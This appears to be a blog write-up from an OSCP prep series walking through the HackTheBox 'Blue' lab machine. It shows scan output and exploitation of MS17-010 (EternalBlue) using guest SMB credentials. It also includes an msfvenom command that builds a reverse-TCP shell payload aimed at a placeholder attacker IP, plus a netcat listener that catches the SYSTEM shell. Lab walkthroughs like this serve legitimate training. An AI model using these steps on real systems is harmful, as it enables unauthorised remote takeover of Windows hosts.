TJnull OSCP Prep Series
HackTheBox: Blue [OSCP Prep]

HackTheBox: Blue [OSCP Prep]


Box Info:

  • OS: Windows 💠
  • Difficulty: Easy 😇
  • Release: 28 Jul 2017 📅
  • IP: 10.10.10.40 💻
  • Box Creator: ch4p 😎

Hello there guys. Welcome to my 4th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Blue from HackTheBox.

Let’s begin with a full Nmap scan port scan to see what open ports we can find. I’ve used Rustscan because it provides faster Nmap results:

$ rustscan -a 10.10.10.4 -r 1-65535 -- -sV -sC -Pn
PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 2s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53207/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 12383/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 19006/udp): CLEAN (Timeout)
|   Check 4 (port 54754/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-01-12T07:10:24+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-01-12T07:10:22
|_  start_date: 2021-01-12T07:07:47

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.19 seconds

Looking at the Nmap results, we see port 139, 445. Which means the target runs SMB. Now let us do a Nmap script scan more specifically targeting SMB

$ rustscan -a 10.10.10.40 -p 139,445 -- --script 'smb-os-discovery,smb-vuln*' -Pn
PORT    STATE SERVICE      REASON
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-25T20:54:06+01:00
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds

The target is vulnerable to MS17-010 aka eternalblue. Which is a famous exploit developed by the NSA leaked by a hacker group called shadow brokers. You can find more info about MS17-010 history (here).

Exploitation

To exploit MS17-010 manually, I cloned this Github repo. Now, we need to find accessible pipe names using checker.py. By default, it tries with null username and null password (null session).

Figure 1.0

As you can see in Figure 1.0 we couldn’t find any pipe names with username: null & password: null. Maybe the target SMB server has a guest account. Default credentials of guest account:

  • Username: guest
  • password: null (Empty password)

Now in our checker.py change the username and password to guest account credentials accordingly:

Figure 1.2
Figure 1.3

We found some accessible pipe names. We can now use send_and_execute.py to send a shell to the target and execute it.

  • Create a shell to send to the target.
  • Setup a listener.

Create a shell to send to the target:

$ msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKR-IP> LPORT=<ATTACKER-LISTENER-PORT> EXITFUNC=thread -f exe --platform windows > reverse.exe
Figure 1.4

Setup a listener:

$ nc -lvnp 1337

Add guest credentials to send_and_execute.py

Figure 1.5: Add guest credentials to send_and_execute.py

Now we can fire up send_and_execute.py

Figure 1.6

Got a connection back:

Figure 1.7
Figure 1.8

The shell runs with nt authority / system privileges.


I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments